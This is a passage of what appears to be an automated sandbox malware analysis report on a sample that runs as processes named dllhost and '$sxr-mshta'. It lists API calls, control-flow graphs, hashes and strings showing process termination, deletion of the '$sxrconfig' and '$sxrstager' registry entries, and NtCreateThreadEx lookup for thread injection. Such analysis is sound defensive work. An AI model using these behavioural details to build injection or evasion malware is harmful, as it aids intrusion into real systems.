                                                                                                            • API ID: Process$Heap$Open$TokenValue$AdjustAllocChangeCloseCurrentDeleteErrorFindFreeLastLookupNotificationPrivilegePrivileges
                                                                                                            • String ID: $sxrstager$SOFTWARE
                                                                                                            • API String ID: 2353213234-1606840681
                                                                                                            • Opcode ID: d6fe065efa0b92b2caeb308442f95c4532e4efd9946b2338f3fdf9202a6ba47c
                                                                                                            • Instruction ID: e2b15fd1bdb0af68db2fceded59578336af26d801dc78018de8527ed98e595ed
                                                                                                            • Opcode Fuzzy Hash: d6fe065efa0b92b2caeb308442f95c4532e4efd9946b2338f3fdf9202a6ba47c
                                                                                                            • Instruction Fuzzy Hash: B401A531B00310BBE7107BF59E4EB6F776D9B44705F00043AF706F62E2DAB89A418658
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 71 401292-4012c0 GetProcessHeap HeapAlloc call 401081 74 4012c2-4012c8 71->74 75 40130c-40131e GetProcessHeap RtlFreeHeap 71->75 76 4012ca-4012cb 74->76 77 40130b 74->77 78 4012cd-4012d6 76->78 77->75 79 401302-401308 78->79 80 4012d8-4012db 78->80 79->78 82 40130a 79->82 80->79 81 4012dd-4012ee OpenProcess 80->81 81->79 83 4012f0-4012fc TerminateProcess CloseHandle 81->83 82->77 83->79
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040129E
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012A5
                                                                                                              • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                              • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                              • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                              • Part of subcall function 00401081: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                              • Part of subcall function 00401081: K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                              • Part of subcall function 00401081: OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                              • Part of subcall function 00401081: K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                              • Part of subcall function 00401081: ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                              • Part of subcall function 00401081: FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 004011EB
                                                                                                              • Part of subcall function 00401081: GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                              • Part of subcall function 00401081: RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 0040120C
                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012E3
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012F3
                                                                                                            • CloseHandle.KERNEL32(000003E8,?,?,?,?,?,0040154B,?,?,?,?,00401501), ref: 004012FC
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 0040130F
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,?,0040154B,?,?,?,?,00401501), ref: 00401316
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess$Alloc$CloseEnumFreeOpen$ChangeFindHandleMemoryModulesNotificationProcessesReadTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1088988999-0
                                                                                                            • Opcode ID: 757573c93e28f14fb1ba0b7102d0f3237b6072edb6f5997e5a0090194d86dbfe
                                                                                                            • Instruction ID: ab2b09c8b71ca9c99a709ec0924a6b803fad294693bd42ca56058f473aaebc13
                                                                                                            • Opcode Fuzzy Hash: 757573c93e28f14fb1ba0b7102d0f3237b6072edb6f5997e5a0090194d86dbfe
                                                                                                            • Instruction Fuzzy Hash: B601C071A00301ABEB116BE48F0DB5F77A8EB04712F144136EA05B22E1DBB88D40C768
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00401509: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                              • Part of subcall function 00401509: RegDeleteValueW.KERNELBASE(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                              • Part of subcall function 00401509: GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                              • Part of subcall function 00401509: HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                              • Part of subcall function 00401509: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                              • Part of subcall function 00401509: RtlFreeHeap.NTDLL(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                            • ExitProcess.KERNEL32 ref: 00401502
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocDeleteExitFreeOpenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3703222776-0
                                                                                                            • Opcode ID: a5779c28a6b8967d7da92993e240726da911757312e1828e8db22bb694370d56
                                                                                                            • Instruction ID: d57de1a7dd692de033d0a6d08cf0830a53249df09c6425f09644fba4c2c840d6
                                                                                                            • Opcode Fuzzy Hash: a5779c28a6b8967d7da92993e240726da911757312e1828e8db22bb694370d56
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,00000000,000F013F,000003E8,?,00000000), ref: 00401022
                                                                                                            • RegDeleteKeyW.ADVAPI32(000003E8,?), ref: 00401038
                                                                                                            • RegEnumKeyExW.ADVAPI32(000003E8,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00401058
                                                                                                            • RegCloseKey.ADVAPI32(000003E8,?,00000000), ref: 00401065
                                                                                                            • RegDeleteKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,000F013F,00000000,?,00000000), ref: 00401077
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Delete$CloseEnumOpen
                                                                                                            • String ID: SOFTWARE\$sxrconfig
                                                                                                            • API String ID: 3013565938-435319591
                                                                                                            • Opcode ID: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                            • Instruction ID: d544ddb297f42690969b4a203d904ba38e423bc2ba9d9ccdcf6cbbeeb35745ab
                                                                                                            • Opcode Fuzzy Hash: 2528680542b238720625209ed60730b67297ede93f81eef034d8d6255c84281c
                                                                                                            • Instruction Fuzzy Hash: CD011271500288FBD7609B92DE4DEAB7ABCEBC5741F10007AB605F10A0DB745E44DA35
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,00401271,000003E8,001FFFFF,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00401593), ref: 00401324
                                                                                                            • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00401334
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                            • API String ID: 1646373207-690569937
                                                                                                            • Opcode ID: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                            • Instruction ID: d003ae9fd3514cd023d1297aa5e823454f89fcb9fe9eff1a1c2077655f61d9ec
                                                                                                            • Opcode Fuzzy Hash: 3bcd05d4379314f12e90f4ac3ba0850e69dab5ee5c9b3da2987142fd71515db8
                                                                                                            • Instruction Fuzzy Hash: 63C09270B423009AEE102B715F0DF0B3A686A40B42B1448B3B609F05E4DAFCC484D52C
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:8%
                                                                                                            Total number of Nodes:490
                                                                                                            Total number of Limit Nodes:8
16237 1acea2df666 16235->16237 16236 1acea2df8ef _handle_error 16236->16234 16237->16236 16238 1acea2daeac 5 API calls 16237->16238 16239 1acea2df6e3 16237->16239 16238->16239 16240 1acea2df7e7 16239->16240 16257 1acea2dd760 16239->16257 16240->16236 16242 1acea2db978 __free_lconv_num 4 API calls 16240->16242 16242->16236 16243 1acea2df78f 16243->16240 16244 1acea2df7f6 16243->16244 16245 1acea2df7a4 16243->16245 16246 1acea2daeac 5 API calls 16244->16246 16249 1acea2df810 16244->16249 16245->16240 16247 1acea2dd760 3 API calls 16245->16247 16246->16249 16247->16240 16248 1acea2dd760 3 API calls 16251 1acea2df891 16248->16251 16249->16240 16249->16248 16250 1acea2df8c6 16250->16240 16252 1acea2db978 __free_lconv_num 4 API calls 16250->16252 16251->16250 16263 1acea2dd120 16251->16263 16252->16240 16258 1acea2dd36c try_get_function 2 API calls 16257->16258 16259 1acea2dd79e 16258->16259 16262 1acea2dd7a3 16259->16262 16267 1acea2dd83c 16259->16267 16261 1acea2dd7ff LCMapStringW 16261->16262 16262->16243 16264 1acea2dd143 WideCharToMultiByte 16263->16264 16266 1acea2e30b0 16264->16266 16268 1acea2dd36c try_get_function 2 API calls 16267->16268 16269 1acea2dd86a 16268->16269 16269->16261 16271 1acea2dabe1 16270->16271 16272 1acea2dabeb 16270->16272 16271->16272 16277 1acea2dac06 16271->16277 16273 1acea2db8e0 _set_errno_from_matherr 4 API calls 16272->16273 16274 1acea2dabf2 16273->16274 16275 1acea2db7c0 _invalid_parameter_noinfo 6 API calls 16274->16275 16276 1acea2dabfe 16275->16276 16276->15835 16277->16276 16278 1acea2db8e0 _set_errno_from_matherr 4 API calls 16277->16278 16278->16274 16283 1acea2da781 16279->16283 16284 1acea2da738 16279->16284 16280 1acea2da7aa 16282 1acea2db978 __free_lconv_num 4 API calls 16280->16282 16281 1acea2db978 __free_lconv_num 4 API calls 16281->16283 16282->16284 16283->16280 16283->16281 16284->15837 16285 1ace90029a0 16286 1ace90029ce 16285->16286 16287 1ace9002a2c VirtualAlloc 16286->16287 16288 1ace9002a50 16286->16288 
16287->16288 16289 7ff64e1d1500 16308 7ff64e1d19d4 16289->16308 16293 7ff64e1d154b 16294 7ff64e1d155d 16293->16294 16295 7ff64e1d1577 Sleep 16293->16295 16296 7ff64e1d156d _amsg_exit 16294->16296 16300 7ff64e1d1584 16294->16300 16295->16293 16296->16300 16297 7ff64e1d15fc _initterm 16299 7ff64e1d1619 _IsNonwritableInCurrentImage 16297->16299 16298 7ff64e1d15dd 16299->16298 16301 7ff64e1d167d 16299->16301 16302 7ff64e1d16f8 _ismbblead 16299->16302 16300->16297 16300->16298 16300->16299 16312 7ff64e1d1008 GetVersion 16301->16312 16302->16299 16305 7ff64e1d16cf 16305->16298 16307 7ff64e1d16d8 _cexit 16305->16307 16306 7ff64e1d16c7 exit 16306->16305 16307->16298 16309 7ff64e1d1509 GetStartupInfoW 16308->16309 16310 7ff64e1d1a00 6 API calls 16308->16310 16309->16293 16311 7ff64e1d1a7f 16310->16311 16311->16309 16313 7ff64e1d108f 16312->16313 16314 7ff64e1d1046 16312->16314 16348 7ff64e1d1378 16313->16348 16314->16313 16315 7ff64e1d104a GetModuleHandleW 16314->16315 16315->16313 16318 7ff64e1d1062 GetProcAddress 16315->16318 16318->16313 16320 7ff64e1d107d 16318->16320 16319 7ff64e1d1378 malloc 16321 7ff64e1d10b0 16319->16321 16320->16313 16322 7ff64e1d1323 16321->16322 16323 7ff64e1d10c8 LoadLibraryW 16321->16323 16325 7ff64e1d134a RegCloseKey 16322->16325 16326 7ff64e1d1356 16322->16326 16323->16322 16324 7ff64e1d10e7 GetProcAddress 16323->16324 16327 7ff64e1d1102 16324->16327 16328 7ff64e1d113f FreeLibrary 16324->16328 16325->16326 16326->16305 16326->16306 16327->16328 16328->16322 16329 7ff64e1d1157 RegOpenKeyExA 16328->16329 16329->16322 16330 7ff64e1d118d RegQueryValueExA 16329->16330 16330->16322 16331 7ff64e1d11bc 16330->16331 16332 7ff64e1d11c4 ExpandEnvironmentStringsA 16331->16332 16333 7ff64e1d11e7 LoadLibraryA 16331->16333 16332->16322 16334 7ff64e1d11e4 16332->16334 16335 7ff64e1d1208 16333->16335 16334->16333 16336 7ff64e1d1220 RegCloseKey 16335->16336 16337 7ff64e1d1231 GetModuleHandleW 16335->16337 16336->16337 16338 7ff64e1d124d GetProcAddress 
16337->16338 16347 7ff64e1d12d1 16337->16347 16340 7ff64e1d126b 16338->16340 16338->16347 16339 7ff64e1d12e6 GetProcAddress 16341 7ff64e1d1314 FreeLibrary 16339->16341 16342 7ff64e1d1301 16339->16342 16343 7ff64e1d1378 malloc 16340->16343 16341->16322 16342->16341 16344 7ff64e1d1296 16343->16344 16345 7ff64e1d129e MultiByteToWideChar 16344->16345 16344->16347 16346 7ff64e1d12c3 UnregisterApplicationRestart 16345->16346 16345->16347 16346->16347 16347->16322 16347->16339 16349 7ff64e1d1396 malloc 16348->16349 16350 7ff64e1d10a6 16349->16350 16351 7ff64e1d1387 16349->16351 16350->16319 16351->16349 16351->16350 16352 7ff64e1d14b0 __getmainargs 16353 1acea2db900 16358 1acea2db911 _set_errno_from_matherr 16353->16358 16354 1acea2db962 16357 1acea2db8e0 _set_errno_from_matherr 3 API calls 16354->16357 16355 1acea2db946 HeapAlloc 16356 1acea2db960 16355->16356 16355->16358 16357->16356 16358->16354 16358->16355

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryProc$CloseFreeHandleLoadModule$ApplicationByteCharEnvironmentExpandMultiOpenQueryRestartStringsUnregisterValueVersionWide
                                                                                                            • String ID: HeapSetInformation$Kernel32.dll$RegisterApplicationRestart$RunHTMLApplication$WLDP.DLL$WldpGetLockdownPolicy$clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32$kernel32.dll
                                                                                                            • API String ID: 964684844-3560873152
                                                                                                            • Opcode ID: dc379254d7062b2c9d9d99fd964e67e02d36f5c1262e3285976f4046407a451e
                                                                                                            • Instruction ID: 6f1a2729b29337540d7ef69ce0483aad55ede80e8dabb7a75036e3ac329fe8fd
                                                                                                            • Opcode Fuzzy Hash: dc379254d7062b2c9d9d99fd964e67e02d36f5c1262e3285976f4046407a451e
                                                                                                            • Instruction Fuzzy Hash: D9914235B4C64296FB14BB61A84097976A1FF59BA4B448334EE2E877D4DF3CF445CA00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                            • String ID:
                                                                                                            • API String ID: 2995914023-0
                                                                                                            • Opcode ID: 8ef2287d5b1e52fc58e3dc8e8be003c765be3ed4ec92099b48e4b2bdbdfc42d3
                                                                                                            • Instruction ID: 9ce18431be7ac1266546f5b5290e517e13c0bd4919b75c8b07c04d19a30ae9fb
                                                                                                            • Opcode Fuzzy Hash: 8ef2287d5b1e52fc58e3dc8e8be003c765be3ed4ec92099b48e4b2bdbdfc42d3
                                                                                                            • Instruction Fuzzy Hash: 0D51157AB8C64686F760BB21E840B7923A0AB65744F584235FA5EC36A1DF7CF845CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3328510275-0
                                                                                                            • Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                            • Instruction ID: d7e44de80ec280aac5274c655e623d31870291c3fec4d6edb48b5ed20f94a573
                                                                                                            • Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                            • Instruction Fuzzy Hash: 8921FB31B17B5086E6609F166404299BBA4FB85BD1F485224DE8D37BDBDF38C4518781
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3381060443.00007FF64E1D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64E1D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380937686.00007FF64E1D0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000A.00000002.3381136829.00007FF64E1D2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000A.00000002.3381242607.00007FF64E1D4000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_7ff64e1d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __getmainargs
                                                                                                            • String ID:
                                                                                                            • API String ID: 3565562838-0
                                                                                                            • Opcode ID: cdd84e5d3e8c1246c9bff8370a8ef8597eefc2c4ea14271d2e770916b66b2895
                                                                                                            • Instruction ID: 3a66ebd7201b44840360df93bb57a1999369df8448cf2c3f9572efc7e56f2eae
                                                                                                            • Opcode Fuzzy Hash: cdd84e5d3e8c1246c9bff8370a8ef8597eefc2c4ea14271d2e770916b66b2895
                                                                                                            • Instruction Fuzzy Hash: D9E0527CE8D64B96EB10BB50A8408B93760BB25744B804032E50D93220DE3CB209CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380536847.000001ACE9000000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001ACE9000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1ace9000000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction ID: 967f5a60b1285b5eef8a28cd2e8c1313bc106c537eda0a7a65d4cc7fb4b1b414
                                                                                                            • Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
                                                                                                            • Instruction Fuzzy Hash: B161367270225087EF68CF99D4507EDFBA2FB4AB94F848825DA0987785DB38D852C742
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
                                                                                                            • Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 4292702814-0
                                                                                                            • Opcode ID: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                            • Instruction ID: 83df6916cc1239768e0931c53856f4ddedb9e0b88209bf89eccc87a24bbd9ebf
                                                                                                            • Opcode Fuzzy Hash: 99623a56c0c66f7076cff61b7992f2e54951593381f89bb610799b11ef7b8552
                                                                                                            • Instruction Fuzzy Hash: 9BF090747032C488FE555B6E96613D51A805B4BB82F0C8434C90EB63D3DD2DC4808693
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 193 1acea2db978-1acea2db97b 194 1acea2db9b4 193->194 195 1acea2db97d-1acea2db996 HeapFree 193->195 196 1acea2db998 call 1acea2db8e0 195->196 197 1acea2db9af-1acea2db9b3 195->197 196->197 197->194
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
• Instruction ID: 333e2d96aa62b3b99d42db3355980e81897da702e772fe3cb6e74ba7cf284712
• Opcode Fuzzy Hash: 7994f22efeca7fbf2ebf4fa9e0693c4504f092aa8c4df1e1e5e2e684e68eef88
• Instruction Fuzzy Hash: 85D02270B030808AFF1997EF68613F009405F97B87F04C028CC0CB1253EA0144D046C3
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced)

Memory Dump Source
• Source File: 0000000A.00000002.3379031607.000001ACE8AF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001ACE8AF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1ace8af0000_$sxr-mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction ID: 221c8e864b36e7735be923a6526a0bd4c90093ff6b0ac4698a62851cba458ce5
• Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
• Instruction Fuzzy Hash: 1B90021459740655D41512910C4629D64406389350FD444904416A0144D58D02A653A3
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
• Instruction ID: 35a1bed24b142ae761158cbd6255e29769bcfeccd1271f0b0450a59f2a7e0adf
• Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
• Instruction Fuzzy Hash: 56B1D1323126918AEB598F2DD5407E97BA4FB42B86F14901AEE4D63B96DF35CC80C781
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
• Instruction ID: 14bf8d0c2ebe5fe5bf4a41482183571988ed84d3eed68f1bcc8515b10a2eb459
• Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
• Instruction Fuzzy Hash: 1431A272302B808EEB608F68E8407ED7760F78574AF44802ADA8E57B95DF38C548C750
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
• Instruction ID: 4c082cc9b46a12a4ff83e2f63ed2fb3b50bc58d30a4a487a732a2ceb36c8e9b4
• Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
• Instruction Fuzzy Hash: 4131C436315F809ADB20CF29E8407DE37A0F789755F504116EA9D53B95DF38C545CB80
Uniqueness

Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000A.00000002.3380656161.000001ACEA2D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001ACEA2D0000, based on PE: true
• Associated: 0000000A.00000002.3380656161.000001ACEA2F5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_1acea2d0000_$sxr-mshta.jbxd
Similarity
• API ID: ErrorFileLastWrite$ConsoleOutput
• String ID:
• API String ID: 1443284424-0
• Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
• Instruction ID: f075b858299845cf7ae963e4c83b004bac1486a2d2b440fad124134e81e63d0e
